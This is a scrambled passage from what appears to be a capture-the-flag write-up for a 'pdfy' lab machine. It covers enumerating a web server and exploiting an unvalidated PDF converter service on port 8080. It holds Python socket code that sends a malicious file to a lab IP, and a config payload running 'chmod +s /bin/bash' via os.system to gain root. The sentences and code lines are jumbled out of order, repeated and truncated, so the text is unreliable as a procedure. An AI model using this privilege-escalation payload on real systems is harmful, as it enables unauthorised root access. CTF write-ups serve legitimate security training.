Next, we proceed to enumerate the web server on port 80. We access the website using our browser and notice that it appears to be a simple web application with a search functionality. We also observe that the website uses a .pdf extension for its pages, which could indicate that the PDF converter service on port 8080 might be related to the web application.
# Receive the response response = s.recv(1024)
# Close the socket s.close()
We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.
{ "converter": { "command": "/usr/bin/python -c 'import os; os.system(\"chmod +s /bin/bash\")'" } } After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access. pdfy htb writeup upd
# Send the malicious file s.send(malicious_file.encode())
# Connect to the PDF converter service s.connect(('10.10.11.232', 8080)) Next, we proceed to enumerate the web server on port 80
# Define the malicious file contents malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…"